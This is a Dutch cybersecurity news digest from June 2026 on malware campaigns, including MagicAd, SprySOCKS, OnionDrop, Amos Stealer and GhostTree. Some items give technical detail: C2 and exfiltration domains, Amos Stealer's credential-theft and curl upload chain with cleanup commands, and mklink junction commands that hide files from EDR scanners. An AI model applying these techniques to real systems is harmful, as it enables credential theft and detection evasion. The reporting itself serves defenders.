Dit incident past in een patroon van aanvallen door Handala in 2026, waarbij de groep vaak legitieme gegevensdiefstal combineert met overdreven en niet-geverifieerde claims. Eerdere incidenten in maart omvatten claims tegen het medische technologiebedrijf Stryker en het betalingsbedrijf Verifone. Stryker gaf toe netwerkproblemen te hebben gehad, maar Verifone vond geen tekenen van een inbreuk. Handala beweerde tweehonderdduizend apparaten bij Stryker te hebben gewist, een aantal dat door onderzoekers niet is geverifieerd. De groep hackte ook het persoonlijke Gmail account van FBI-directeur Kash Patel en publiceerde zijn cv en reisfoto's om de Amerikaanse cyberdefensie te bespotten. Eerder deze maand beweerde Handala Israëlische militaire radarnetwerken te hebben uitgeschakeld; een onderzoek van SOCRadar wees echter uit dat de hackers alleen toegang hadden verkregen tot het telefoonrouteringssysteem van een lokaal gemeentehuis.

Naar aanleiding van de inbreuk is Cal Water geadviseerd om alle blootgestelde wachtwoorden onmiddellijk te wijzigen en de mapping systemen te scheiden van de klantfactureringsnetwerken om toekomstige problemen te voorkomen. Beveiligingsteams blijven alert op verdere activiteiten.

Experts hebben gereageerd op het incident. Sean Malone, Chief Information Security Officer bij BeyondTrust, benadrukte dat de claims van de groep over operationele controle zeer verdacht zijn. Volgens Malone ondersteunt niets in het gepubliceerde bewijs Handala's bewering dat zij de watertoevoer in Amerikaanse steden kunnen afsluiten. Dataminr heeft vastgesteld dat de groep een GPS-correctieserver en een klantfactureringsdatabase heeft bereikt. Geen van deze systemen controleert de waterbehandeling of -distributie, en Dataminr heeft niet bevestigd dat er sprake is van verstoring van operationele technologie of industriële controlesystemen. Malone stelde dat Handala een geschiedenis heeft van het overdrijven van hun capaciteiten.

John Gallagher, Vice President bij Viakoo, plaatste het incident in een bredere context door te wijzen op de manier waarop de hackers toegang kregen tot zowel de zakelijke als de fysieke netwerken van het nutsbedrijf. Hij waarschuwde dat deze tactiek een toenemend probleem vormt voor kritieke infrastructuur. Gallagher trok parallellen met de Colonial Pipeline-afsluiting, waarbij aanvallers een factureringsserver konden gebruiken om pijplijnoperaties te beïnvloeden. In dit geval was de beweging omgekeerd (van operationele systemen naar een factureringsserver), wat aantoont dat 'pivot points' tussen operationele technologie (OT)/Internet of Things (IoT) en bedrijfsnetwerken worden geëxploiteerd. Gallagher adviseerde organisaties om onmiddellijk hun beveiligingsmaatregelen te herzien, met name het elimineren van dergelijke pivot points en het afdwingen van strikte, zero-trust netwerksegmentatie. IoT-applicaties, telemetrieplatforms en slimme infrastructuur moeten op geïsoleerde netwerken worden geplaatst, volledig gescheiden van bedrijfssystemen zoals facturering, e-mail of bedrijfsdatabases. Een compromittering aan de operationele kant mag nooit toegang verlenen tot bedrijfsdata.

 

Bron: Dataminr

16 juni 2026 | Meer dan 50 Android apps verspreiden MagicAd trojan via officiële stores

Meer dan vijftig Android applicaties blijken de MagicAd trojan te verspreiden via officiële app stores. Dit illustreert een zorgwekkende trend waarbij advertentie-leverende dreigingen evolueren naar geavanceerde tools die ontworpen zijn om beveiligingsmaatregelen te omzeilen.

De Android.MagicAd.1 malware deed voor het eerst zijn intrede in 2025, maar onderzoekers hebben nu vastgesteld dat de trojan wordt gepusht via ruim vijftig besmette games en hulpprogramma's. Deze kwaadaardige apps waren niet beperkt tot dubieuze downloadsites; ze werden ook gedistribueerd via gerenommeerde platforms zoals de Samsung Galaxy Store en Xiaomi's GetApps catalogus.

Om vroege detectie door beveiligingsscanners te omzeilen, roteerden de aanvallers hun applicaties. Ze hielden de apps minder dan een maand online voordat ze deze vervingen door nieuwe versies. Echter, zodra de trojan eenmaal was gedownload, bleef deze actief op de apparaten van gebruikers.

De aanvalsketen begint met verborgen, versleutelde componenten binnen de native codebibliotheken van de app. Wanneer een slachtoffer een gecompromitteerde app opent, ontsleutelt de malware deze bronnen om een kerncomponent, genaamd Android.MagicAd.1.origin, te extraheren.

Deze Android malware voert ook omgevingscontroles uit voordat de payload wordt gelanceerd. Het scant naar virtuele machines of op een zwarte lijst staande IP-adressen om er zeker van te zijn dat het niet wordt gemonitord door beveiligingsonderzoekers. Als de omgeving veilig wordt bevonden, verbergt de malware het app-pictogram van het startschermmenu en plant het achtergrondtaken in om permanent actief te blijven.

De onderzoekers van Doctor Web legden uit dat moderne Android besturingssystemen apps op de achtergrond strikt verbieden om zichzelf te starten of vensters over andere programma's weer te geven zonder expliciete toestemming. Android.MagicAd.1 omzeilt deze barrière echter door zich te richten op vertrouwde, vooraf geïnstalleerde systeemapplicaties. De exacte methode hiervoor is sterk afhankelijk van de telefoonfabrikant.

Op Xiaomi- en Amazon-apparaten stuurt de malware een vertraagde systeemopdracht, een zogenaamde "pending intent", naar zijn interne component, Android.MagicAd.1.origin. Deze opdracht wordt via standaard systeemapps zoals Mi Browser, Miui SystemUI, of de Amazon Fire TV startschermlauncher geleid om zichzelf te activeren en transparante advertentiebanners over actieve schermen te tekenen.

Voor Vivo-apparaten exploiteren de aanvallers een intern communicatiesysteem genaamd Android Binder. Ze sturen datapakketten via standaardtools zoals iManager, Phonebook of Vivo Browser om de advertenties op de achtergrond te triggeren.

Op andere merken maakt de trojan gebruik van een slimme, universele terugvalmethode. Het slaat een stil audiobestand op, opent de systeemmediaspeler op nul volume en simuleert een fysieke klik op een knop met behulp van een achtergrondopdracht. Deze truc misleidt het besturingssysteem, waardoor de trojan onmiddellijk prioriteit krijgt om zijn advertenties weer te geven.

Doctor Web heeft bevestigd dat alle geïdentificeerde kwaadaardige apps inmiddels uit de officiële stores zijn verwijderd. Hoewel de directe distributiecyclus is doorbroken, toont deze campagne aan hoe gemakkelijk dreigingsactoren de software die bedoeld is om ons te beschermen, kunnen misbruiken.

 

Bron: Doctor Web

16 juni 2026 | Toegangshandelaar RDPCorp koopt actief bedrijfsnetwerktoegang op Nederlandstalig cybercrimeforum

Een cybercrimineel die de naam RDPCorp gebruikt, is volgens recente monitoring actief bezig met het werven op een Nederlandstalig cybercrimeforum. Het doel is het opkopen van toegang tot bedrijfsnetwerken, om deze vervolgens door te verkopen aan andere aanvallers, waaronder ransomwaregroepen.

RDPCorp beweert al ruim vijf jaar actief te zijn op diverse bekende criminele fora en belooft verkopers een snelle uitbetaling zodra de aangeboden netwerktoegang is geverifieerd. De handelaar is geïnteresseerd in een breed scala aan doelwitten, variërend van kleinere organisaties tot grotere entiteiten, specifiek gericht op geselecteerde Europese landen.

De activiteiten van dergelijke tussenhandelaren zijn van cruciaal belang voor de bredere economie van cybercriminaliteit, aangezien zij de initiële toegang leveren die door bijvoorbeeld ransomwaregroepen wordt gebruikt om hun aanvallen uit te voeren. Hoewel deze claims afkomstig zijn van een forumadvertentie, en niet onafhankelijk zijn bevestigd, onderstrepen ze de constante dreiging van gespecialiseerde actoren die de weg plaveien voor grootschalige cyberaanvallen. Bedrijven en organisaties in de regio dienen zich bewust te zijn van deze methoden voor initiële toegang.

 

Bron: Darkweb

17 juni 2026 | SprySOCKS malware nu ook op Windows ingezet tegen overheidsorganisaties

ESET-onderzoekers hebben Windows-varianten ontdekt van de SprySOCKS malware voor Linux, die tussen 2023 en 2024 zijn ingezet bij aanvallen op overheidsorganisaties in Taiwan, Thailand, Pakistan en Honduras. SprySOCKS wordt in verband gebracht met de Chinese dreigingsgroep ‘Earth Lusca’, die ook bekend staat als ‘FishMonger’, ‘Aquatic Panda’, ‘Red Dev 10’ en TAG-22. De groep richt zich op entiteiten binnen buitenlandse zaken, technologie en telecommunicatie.

De Windows-varianten van SprySOCKS onderscheiden zich van de eerder gedocumenteerde Linux-versie door de toevoeging van stealth-mogelijkheden op kernelniveau. Deze functionaliteit stelt de aanvallers in staat om sporen van de malware te verbergen en te communiceren met de backdoor via omgeleid verkeer van willekeurige TCP-poorten, zonder de werkelijke luisterpoort bloot te leggen. ESET heeft de activiteit met grote zekerheid toegeschreven aan de Earth Lusca dreigingsactor.

De ontdekte Windows-varianten zijn onderverdeeld in WIN_DRV en WIN_PLUS. De WIN_DRV-versie bevat kernel drivers die rootkit-achtige capaciteiten mogelijk maken, terwijl WIN_PLUS een meer gestripte backdoor is. Beide varianten bieden uitgebreide functionaliteit, waaronder communicatie via TCP, UDP en WebSocket, ondersteuning voor meer dan 30 command-and-control (C2) commando's, het verzamelen van systeeminformatie, het beheren van processen en services, en uitgebreide bestandsbeheeropties (lijsten, creëren, verwijderen, uploaden, downloaden, kopiëren, hernoemen en uitvoeren). Daarnaast ondersteunen ze SOCKS proxy functionaliteit, kunnen ze zowel als client als server opereren, en loggen ze toetsaanslagen, klembordinhoud en titels van actieve vensters.

De WIN_DRV-variant beschikt over de extra mogelijkheid om een driver genaamd ‘RawWNPF’ direct in het geheugen te laden. Deze driver wordt geladen vanuit een andere kernel driver, ‘DriverLoader’ (fsdiskbit.sys), die is ondertekend met een gelekt certificaat van het GitHub PastDSE project. De driver stelt de malware in staat om processen te verbergen via Windows API-manipulatie, netwerkverbindingen te verbergen, bestanden te maskeren in directory-overzichten en kwaadaardige Registry-sleutelvermeldingen te verbergen die worden gebruikt voor persistentie. Persistentie wordt bereikt via geplande taken en Image File Execution Options (IFEO) via vds.exe voor WIN_DRV, en door de payload te registreren als een Windows Print Processor (VSPMsg) voor WIN_PLUS.

ESET-telemetrie toonde ook aanwijzingen voor een UEFI bootkit component die mogelijk misbruik maakt van CVE-2023-24932, een Secure Boot kwetsbaarheid die eerder als zero-day werd gebruikt door de BlackLotus UEFI malware. Echter, verdere details of sterk bewijs ter ondersteuning van een link met BlackLotus werden niet verstrekt. ESET's rapport biedt een gedetailleerde technische analyse en Indicators of Compromise die organisaties kunnen helpen bij het identificeren en beschermen tegen aanvallen met Windows-versies van de SprySOCKS backdoor. De ontdekking van deze varianten onderstreept de uitbreiding van het arsenaal van Earth Lusca om een diverser scala aan systemen aan te vallen.

 

Bron: ESET | Bron 2: welivesecurity.com | Bron 3: hubs.li

17 juni 2026 | Nieuwe OnionDrop loader campagne gebruikt geavanceerde gainmsg C2

Een recent ontdekte loader campagne baart de cybersecurity gemeenschap grote zorgen. Onderzoekers hebben een actieve operatie blootgelegd die gebruikmaakt van een geavanceerde meerstaps loader, genaamd OnionDrop. Deze loader wordt ingezet om schadelijke payloads, waaronder de bekende LegionLoader, op grote schaal bij diverse slachtoffers te bezorgen.

OnionDrop is minstens sinds februari 2026 actief en heeft in ongeveer 80 dagen meer dan 645 unieke kwaadaardige DLL-bestanden verspreid. De campagne was ten tijde van publicatie nog steeds actief, wat duidt op een aanhoudende en groeiende dreiging die serieuze aandacht vereist van verdedigers. De loader onderscheidt zich niet alleen door de payloads die het aflevert, maar ook door de buitengewone technische verfijning die in de loader zelf is verwerkt.

Analisten van Cyderes, via hun Howler Cell Threat Research Team, publiceerden een gedetailleerde analyse van OnionDrop. Zij identificeerden het als de derde gedocumenteerde component in een bredere campagne die zij volgen, na de CGrabber Infostealer en Direct-sys Loader operaties. Cyderes stelde in een rapport dat de evasiestructuur die in OnionDrop is ingebouwd, kan wedijveren met, en op sommige gebieden zelfs overtreffen, wat doorgaans wordt waargenomen bij speciaal gebouwde tools van natiestaten.

Wat deze campagne bijzonder gevaarlijk maakt, is het payload-onafhankelijke ontwerp van de loader. OnionDrop heeft bewezen LegionLoader (ook bekend als CurlyGate), CGrabber Infostealer en Vidar Stealer in verschillende golfbewegingen van de campagne te kunnen afleveren. Dit wijst op een zeer georganiseerde, hoogfrequente dreigingsactor die gelijktijdig meerdere infostealer-operaties uitvoert, zonder tekenen van vertraging. Beveiligingsteams worden aangespoord om te controleren op de bekende Indicators of Compromise (IoC's) die aan deze campagne zijn gekoppeld, verbindingen met het geïdentificeerde C2-domein te blokkeren en ervoor te zorgen dat regels voor endpointdetectie zijn bijgewerkt om DLL-sideloading gedrag te markeren waarbij uitvoerbare bestanden met Adobe-ondertekening in ZIP-archieven aankomen.

De aanvalsketen begint met een ZIP-archief dat een legitiem, door Adobe ondertekend uitvoerbaar bestand bevat, oorspronkelijk genaamd AcroBroker.exe. Daarnaast zijn er twee kwaadaardige DLL-bestanden aanwezig, genaamd sqlite.dll en codecstore384d.dll. Het archief bevat ook een lokbestand van 100 MB, genaamd data.bin, gevuld met willekeurige bytes om de archiefgrootte kunstmatig op te blazen en analyse te bemoeilijken. Zodra het uitvoerbare Adobe-bestand wordt gestart, sideloadt het sqlite.dll, dat vervolgens de primaire kwaadaardige DLL laadt.

Van daaruit doorloopt OnionDrop vier verschillende uitpakstadia: custom byte-pair decodering, Xpress Huffman decompressie, AES-256-CBC decryptie met roterend sleutelmateriaal, en uiteindelijke shellcode-uitvoering via misbruik van de Thread Pool callback via TpPostWork. Elk stadium is ontworpen om zowel geautomatiseerde sandboxes als handmatige analistenbeoordeling te omzeilen. De uiteindelijke payload, LegionLoader, ontsleutelt zijn ingebedde configuratie met behulp van RC4 en maakt verbinding met zijn command-and-control-server op gainmsg[.]com/nfront[.]php. Deze C2-infrastructuur dient als de ruggengraat voor de stroom van gestolen gegevens en verdere instructies. Onderzoekers bevestigden dat dezelfde loader-keten ook CGrabber Infostealer en Vidar Stealer afleverde in gerelateerde campagnegolven.

Wat OnionDrop onderscheidt van typische commodity loaders, is de diepte van zijn anti-analyse mogelijkheden. De malware gebruikt stack-string constructie om gevoelige functienamen te verbergen, deze dynamisch op te lossen tijdens runtime in plaats van ze in leesbare vorm op te slaan. Het maakt ook gebruik van API-hammering, een techniek die sandbox-traces overspoelt met irrelevante API-aanroepen, waardoor het voor geautomatiseerde systemen veel moeilijker wordt om daadwerkelijk kwaadaardig gedrag te lokaliseren. Voordat de kernlogica wordt uitgevoerd, controleert OnionDrop de naam van het weergaveapparaat van het systeem aan de hand van een hardgecodeerde lijst van geldige GPU-strings, zoals INTEL, AMD, RADEON en NVIDIA. Als het systeem een virtuele omgeving of sandbox met een niet-standaard weergaveadapter lijkt te zijn, stopt de uitvoering onmiddellijk. Dit niveau van omgevingsbewustzijn wordt doorgaans geassocieerd met gerichte aanvalsframeworks, niet met breed verspreide malware.

De laatste shellcode-fase gebruikt een door Donut gegenereerde payload en wordt uitgevoerd via de Windows Thread Pool via misbruik van de TpAllocWork callback, een techniek die de standaard telemetrie voor thread-creatie omzeilt waarop de meeste beveiligingstools vertrouwen. Roterend AES-sleutelmateriaal over verschillende uitvoeringsstadia voegt verdere weerstand toe tegen statische analyse. Samen vormen deze technieken een diepgaand ontworpen evasiestack die een duidelijke en langdurige operationele investering van de dreigingsactor achter deze campagne weerspiegelt.

 

Bron: Cyderes

17 juni 2026 | Steam Workshop misbruikt voor verspreiding van malware via Wallpaper Engine

Dreigingsactoren misbruiken de Steam Workshop, het community platform van Valve, om diverse soorten malware te verspreiden. Deze malware wordt verborgen in wallpaper-pakketten voor de populaire Wallpaper Engine-applicatie. Dit misbruik kan leiden tot de kaping van Steam accounts, de installatie van backdoors op systemen, of het uitvoeren van cryptomining-processen.

Wallpaper Engine is een desktop-aanpassingsapplicatie die beschikbaar is op Steam en waarmee gebruikers hun bureaublad kunnen personaliseren met geanimeerde achtergronden. Het platform ondersteunt verschillende typen wallpapers, waaronder video's, interactieve scènes, webpagina's en uitvoerbare applicaties. Deze ‘applicatie wallpapers’ zijn Windows-applicaties die als achtergrond kunnen dienen, zoals games, desktopwidgets of systeem monitoring tools.

Volgens een recent rapport van cybersecuritybedrijf Kaspersky vertegenwoordigt de functionaliteit van applicatie wallpapers een ingebouwd beveiligingsrisico. Onderzoekers van Kaspersky waarschuwen dat aanvallers dit sinds ten minste eind 2025 misbruiken om malware te leveren aan Steam-gebruikers. Zij ontdekten tientallen kwaadaardige applicatie wallpapers op de Steam Workshop, die elk duizenden tot tienduizenden keren waren gedownload.

De werkwijze van de aanvallers omvat het direct bundelen van de malware in het wallpaper-pakket, of het verbergen ervan in wachtwoordbeveiligde archieven die de gebruiker wordt verleid te openen. Zodra de gebruiker de kwaadaardige wallpaper installeert, worden de payloads automatisch uitgevoerd op het systeem.

Kaspersky testte een van deze wallpapers, vermomd als een game genaamd NTRaholic. Bij uitvoering startte de game zoals verwacht, maar op de achtergrond werd een backdoor-bestand geïnstalleerd dat behoort tot de DarkKomet malware familie. Ook werd een aangepaste versie van een systeembibliotheek, genaamd 'AggregatorHost.dll', geïnstalleerd. Deze bibliotheek is specifiek ontworpen om Steam accounts op de computer te zoeken en accountgegevens te stelen. De onderzoekers vonden ook gevallen waarbij andere malware families, zoals de Lumma en Vidar infostealers, cryptominers, botnet loaders, RanEngine en zelfs ransomware, werden verspreid, wat duidt op de betrokkenheid van meerdere dreigingsactoren.

Steam heeft alle door Kaspersky geïdentificeerde kwaadaardige wallpaper-applicaties inmiddels verwijderd. Echter, de onderzoekers waarschuwen dat dreigingsactoren waarschijnlijk nieuwe pogingen zullen ondernemen om via dit kanaal malware te verspreiden. Kaspersky adviseert gebruikers om content van de Steam Workshop alleen van vertrouwde bronnen te downloaden en alles wat via dit platform wordt gedownload te scannen met een up-to-date antivirusproduct.

 

Bron: Kaspersky | Bron 2: securelist.com | Bron 3: steamdb.info

17 juni 2026 | ClickFix campagnes breiden malwarelevering uit met nieuwe loaders en valse updatemeldingen

Cybersecurityonderzoekers hebben meerdere ClickFix campagnes geïdentificeerd die drie geavanceerde malware loaders verspreiden: BabaDeda Loader, Lorem Ipsum Loader en Potemkin. Deze bevindingen, onafhankelijk gerapporteerd door Morphisec, BlueVoyant en Huntress, tonen een significante evolutie in malwarelevering en ontwijkingstechnieken.

De aanvallen met BabaDeda Loader, waargenomen in april 2026, richtten zich op onderwijs- en financiële organisaties. Morphisec-onderzoeker Shmuel Uzan meldt dat dit nieuwe framework, hoewel het de code-genoom van eerdere BabaDeda-activiteiten behoudt, is uitgebreid tot een capabelere loader voor stealth en payload-flexibiliteit. De campagne start met een ClickFix social engineering aanval, waarbij gebruikers worden misleid om PowerShell commando's uit te voeren. Deze commando's leveren de loader af, die vervolgens informatie stelers en remote access trojans (RATs) dropt. Technieken omvatten verborgen PowerShell, in-memory shellcode, DLL side-loading en externe payload opslag. BabaDeda, een crypter dienst, werd eerder gedocumenteerd in verband met de verspreiding van onder andere LockBit ransomware.

De BabaDeda Loader profileert het hostsysteem, vermijdt uitvoering op Russische of Wit-Russische machines en voert beveiligingsproduct controles uit, waarna de hoofdpayload wordt geïnjecteerd in een vertrouwd Windows proces zoals "svchost.exe". Een van de via BabaDeda geleverde malware families is een .NET backdoor en informatie steler. Deze kan gedetailleerde systeeminformatie verzamelen, browserprofielen en artefacten extraheren (cookies, geschiedenis, inloggegevens), bestandsinhoud lezen en exfiltreren, screenshots maken en shell commando's uitvoeren via een versleuteld command-and-control (C2) kanaal. Een andere aanvalsketen dropt een ZIP-archief dat DLL side-loading gebruikt voor DanaBot en SectopRAT (ArechClient). Hierbij wordt een getrapte loader component, Storage Crypter genaamd, ingezet om de payload van externe bestanden zoals "List.Control.dat" te lezen, wat forensische zichtbaarheid minimaliseert.

De ClickFix techniek is ook waargenomen in een campagne die minimaal vijf gecompromitteerde WordPress sites gebruikt als startpunt voor de levering van de Lorem Ipsum Loader. Deze sites bedienen diverse sectoren, waaronder architectuur en juridische diensten. BlueVoyant-onderzoekers Thomas Elkins en Joshua Green stellen dat de overstap naar ClickFix lokkers op gecompromitteerde WordPress sites het potentiële slachtofferbestand aanzienlijk verbreedt. Deze aanpassing volgt op de recente verstoring door Microsoft van Fox Tempest (Forging Marauder), een dreigingsactor die malware-signing-as-a-service (MSaaS) aanbood. Het verlies van frauduleus verkregen Microsoft Trusted Signing certificaten dwong de operatoren tot een leveringsmechanisme zonder code signing.

Het Lorem Ipsum ecosysteem wordt toegeschreven aan de financieel gemotiveerde dreigingsactor Vanilla Tempest (ook bekend als Rapid Brigantine, Vice Society en Vice Spider), bekend om het inzetten van ransomware families zoals Rhysida, BlackCat, Zeppelin en Quantum Locker. Aanvalssequenties distribueren Lorem Ipsum Loader via ClickFix-achtige Edge webbrowser beveiligingsupdate lokkers. Deze triggeren een kwaadaardig commando dat een ZIP-bestand en een verouderde versie van Node.js (7.10.1 uit 2017) downloadt om JavaScript-gebaseerde payloads uit het archief uit te voeren, met minimale detectiekansen. De JavaScript payload fungeert als dropper voor verdere malware en een batch script dat persistentie instelt via een DLL side-loading keten, waarbij kwaadaardige DLL's zoals "mscoree.dll" of "msvcp140.dll" worden uitgevoerd.

 

Bron: Huntress | Bron 2: bluevoyant.com | Bron 3: derp.ca

17 juni 2026 | Amos Stealer richt zich op macOS Keychain bestanden en browser wachtwoorden

Amos Stealer, een informatie stelende malware, richt zich actief op Apple Mac computers om privédata te stelen. Volgens nieuwe details van cybersecurity onderzoeksbedrijf CyberProof gebruiken dreigingsactoren deze malware familie om financieel gemotiveerde campagnes uit te voeren door macOS omgevingen te compromitteren.

Hoewel Amos Stealer geen nieuwe dreiging is, verspreiden de dreigingsactoren in de meest recente campagne de infostealer via misleidende software downloads, nep websites en social engineering lures. Eenmaal actief op een Mac, zoekt de malware naar waardevolle bestanden in systeem directories. Het verzamelt vervolgens opgeslagen wachtwoorden, sessie cookies en autofill informatie uit Google Chrome en Microsoft Edge browsers.

Onderzoekers merkten op dat de malware operators gebruikmaken van een ingebouwde macOS utility genaamd `curl` om de malafide bestanden stilzwijgend te downloaden. Tijdens een recent incidentonderzoek werd een ongebruikelijk `curl` commando gedetecteerd door een threat hunting query. Verdere analyse onthulde dat de aanvallers specifieke command flags `-fsSL` gebruikten om de download volledig onzichtbaar te maken voor de gebruiker. Deze flags onderdrukken foutmeldingen, schakelen download voortgangsbalken uit en zorgen ervoor dat het script stil op de achtergrond draait. Zodra het script is gedownload, lanceert het automatisch een AppleScript commando via de `zsh` terminal shell om met het verzamelen van data te beginnen.

De informatie stealer kopieert het macOS Keychain database bestand, genaamd `login.keychain-db`, om toegang te krijgen tot opgeslagen bedrijfs login details. Het zoekt ook in het home path van de gebruiker naar vertrouwelijke ontwikkelaars configuratie bestanden en sleutels, waaronder `.kube`, `.ssh`, `.zshrc`, en `.gitconfig`.

Om de data voor te bereiden voor de aanvallers, gebruikt de malware een native macOS tool genaamd `ditto` om de gestolen bestanden te comprimeren tot één archief met de naam `osalogging.zip` in de `/tmp` map. Dit bestand wordt door het script in stukken van 10 MB verdeeld. Voor de upload wordt een unieke sessie ID gegenereerd door de huidige timestamp te combineren met een willekeurige hexadecimale string van OpenSSL. Amos Stealer stuurt de data vervolgens naar een door aanvallers gecontroleerde server adres (`bestbuydomain.com`) met behulp van een HTTP PUT request via `curl`. Een opvallend aspect is dat het systeem mislukte uploads tot wel acht keer opnieuw probeert. Na een succesvolle upload voert Amos Stealer cleanup commando's uit (`rm -f /tmp/osalogging.zip` en `rm -rf /tmp/sync`) om zijn aanwezigheid te wissen.

Dit type stille cyberaanval stelt dreigingsactoren in staat om eenvoudig opgeslagen referenties te stelen, wat gecompromitteerde bedrijfsnetwerken kan blootstellen aan datalekken en financiële diefstal. CyberProof adviseert bedrijven om strikt Gatekeeper beleid te handhaven en endpoints te monitoren op ongebruikelijke `curl` commando's om deze dreigingsactoren te blokkeren.

 

Bron: CyberProof

17 juni 2026 | Aanval met GhostTree verbergt malware via recursieve Windows junctions

Onderzoekers van Varonis hebben een nieuwe aanvalstechniek, genaamd GhostTree, ontdekt die recursieve Windows-junctions misbruikt om malware te verbergen voor detectie door beveiligingsproducten, waaronder Endpoint Detection and Response (EDR)-systemen. Deze techniek creëert effectief oneindige bestandspaden, waardoor tools die mappen recursief proberen te scannen, vastlopen of de kwaadaardige bestanden over het hoofd zien.

NTFS junctions en symbolische links zijn geavanceerde bestandssysteemfuncties in Windows die voornamelijk worden gebruikt voor het omleiden van mappen, het handhaven van backward compatibility met oudere applicaties en voor efficiënt opslagbeheer. Een belangrijk kenmerk van deze junctions is dat elke gebruiker ze kan aanmaken, mits er schrijfrechten zijn op de doelmap, zonder dat hiervoor admin-privileges nodig zijn. Dit gebeurt via een eenvoudig `mklink /J C:\LinkToFolder C:\TargetFolder` commando in CMD.

De kern van de GhostTree-aanval ligt in het terugwijzen van een junction naar zijn eigen oudermap, wat een logische lus creëert. Hierdoor kunnen aanvallers paden genereren die in theorie oneindig lang zijn. Hoewel klassieke Windows systemen een maximale padlengte van 260 karakters hebben (uitbreidbaar tot 32.767 via een registerinstelling), zijn veel applicaties en hulpprogramma's niet ontworpen om paden te verwerken die deze limiet overschrijden. Deze beperking bepaalt uiteindelijk hoe diep de recursieve lussen kunnen gaan.

De techniek kent twee varianten: GhostBranch en GhostTree. GhostBranch is de eenvoudigste en creëert één kindmap die terugwijst naar de oudermap, zoals `mklink /J C:\Parent\Child C:\Parent`. Dit resulteert in een onbeperkt aantal geldige paden naar hetzelfde bestand, bijvoorbeeld `C:\Parent\Child\Program.exe`, `C:\Parent\Child\Child\Program.exe`, enzovoort.

GhostTree bouwt hierop voort door meerdere kindmappen te creëren, bijvoorbeeld `mklink /J C:\Parent\Child1 C:\Parent` en `mklink /J C:\Parent\Child2 C:\Parent`. Hierdoor kan elk niveau in het pad vertakken via 'Child1' of 'Child2', waarbij beide terugverwijzen naar de oudermap. Dit leidt tot een aanzienlijk grotere diversiteit aan paden, zoals `C:\Parent\Child1\Program.exe` en `C:\Parent\Child1\Child2\Program.exe`. Hoewel de maximale diepte van de paden vergelijkbaar blijft met GhostBranch (ongeveer 126 mappen binnen de 260-karakter limiet), kan GhostTree een exponentieel aantal unieke paden genereren. Met twee vertakkingen per niveau resulteert dit in 2^126 mogelijke paden, een getal dat veel groter is dan het aantal zandkorrels op aarde.

Voor verdedigers vormt deze techniek een aanzienlijke uitdaging. EDR-producten en andere beveiligingsscanners die mappen recursief proberen te analyseren, kunnen vastlopen in deze lussen en de kwaadaardige bestanden die in de oudermap zijn geplaatst, over het hoofd zien. Dit stelt aanvallers in staat om malware effectief te verbergen en detectie te omzeilen.

 

Bron: Varonis

17 juni 2026 | Meer dan 90% van cyberincidenten omvat geanonimiseerde infrastructuur

Een recent onderzoek onder ruim 200 beveiligingsprofessionals, uitgevoerd door Spur Intelligence, toont aan dat geanonimiseerde infrastructuur, waaronder VPN’s en residentiële proxynetwerken, nu voorkomt in bijna 94% van alle beveiligingsincidenten. Ondanks de overvloed aan beschikbare IP-gegevens, zoals verrijkingsfeeds, geolocatiegegevens, reputatiescores en dreigingsinformatie, blijven veel organisaties worstelen met het identificeren van de werkelijke dader achter een IP-adres en de te nemen acties.

De studie benadrukt een fundamentele uitdaging, het gebrek aan zichtbaarheid, context en operationele workflows om effectieve beslissingen te nemen op basis van IP-gegevens. Dit ondersteunt een bredere trend van een reactieve benadering bij het beheren van risico’s gebaseerd op IP-adressen.

De wijdverspreide beschikbaarheid van VPN-diensten en residentiële proxynetwerken heeft de werkwijze van cybercriminelen drastisch veranderd. Residentiële proxy’s leiden verkeer om via internetverbindingen van consumenten, waardoor kwaadaardige activiteiten opgaan in normaal gebruikersgedrag. VPN-diensten voegen extra lagen van anonimiteit toe en maken snelle wisselingen tussen locaties en netwerkidentiteiten mogelijk. Hierdoor worden traditionele beveiligingsmethoden, die uitsluitend gebaseerd zijn op reputatie of statische blokkeerlijsten, minder effectief.

Beveiligingsteams worden steeds vaker geconfronteerd met aanvallen waarbij het IP-adres zelf weinig direct inzicht biedt in de intentie. Bijna de helft van de onderzochte bedrijven rapporteerde aanzienlijke operationele of financiële gevolgen van pogingen tot accountovername en misbruik van inloggegevens via VPN’s en residentiële proxy’s. In deze gevallen kan een IP-adres een residentieel adres lijken te zijn, behoren tot een legitieme internetprovider en geen eerdere kwaadaardige reputatie vertonen, terwijl het toch deel uitmaakt van een actieve aanvalscampagne.

Een van de grootste obstakels voor beveiligingsoperaties is het gebrek aan contextuele informatie om te bepalen wie er daadwerkelijk achter een verbinding zit. De studie van Spur Intelligence bevestigt dit, waarbij bijna de helft van de respondenten aangeeft dat een gebrek aan context de grootste uitdaging is voor hun beveiligingsteams bij het analyseren van IP-activiteit. Basiskenmerken van IP-adressen, zoals geolocatie en netwerkeigendom, blijven nuttig, maar ze slagen er vaak niet in om de intentie achter de activiteit te verklaren. Beveiligingsteams hebben behoefte aan extra lagen van context, waaronder infrastructuurclassificatie, attributie van VPN- en proxygebruik, gedragsindicatoren, historische gebruikspatronen, correlaties tussen apparaten en sessies, en signalen van automatisering en bots. Zonder deze context zijn analisten gedwongen beslissingen te nemen op basis van onvolledige informatie. Met context kunnen ze niet alleen begrijpen waar verkeer vandaan komt, maar ook waarom het een verhoogd risico kan vormen.

Hoewel organisaties de waarde van intelligentie over IP-adressen erkennen, gebruiken velen deze nog steeds voornamelijk tijdens onderzoeken. Verrijking van IP-gegevens wordt vaak toegepast nadat waarschuwingen al zijn gegenereerd, om analisten te helpen historische gebeurtenissen te bekijken en incidenten te onderzoeken. Deze aanpak heeft waarde, maar beperkt de strategische impact van intelligentie over IP-adressen. Een groeiend aantal beveiligingsteams onderzoekt manieren om intelligentie over IP-adressen eerder in het besluitvormingsproces te integreren, zodat deze de beveiligingsresultaten in realtime kan beïnvloeden. De Spur-studie toont aan dat de meerderheid van de respondenten intelligentie over IP-adressen gebruikt voor basisgevallen, maar workflows voorspellender en meer op intelligentie gebaseerd wil hebben, bijvoorbeeld voor adaptieve authenticatie, risicogebaseerde toegangscontroles, fraudepreventieworkflows, geautomatiseerde beleidshandhaving en sessierisicoscores. Het doel is om proactief betere beslissingen te nemen voordat incidenten escaleren.

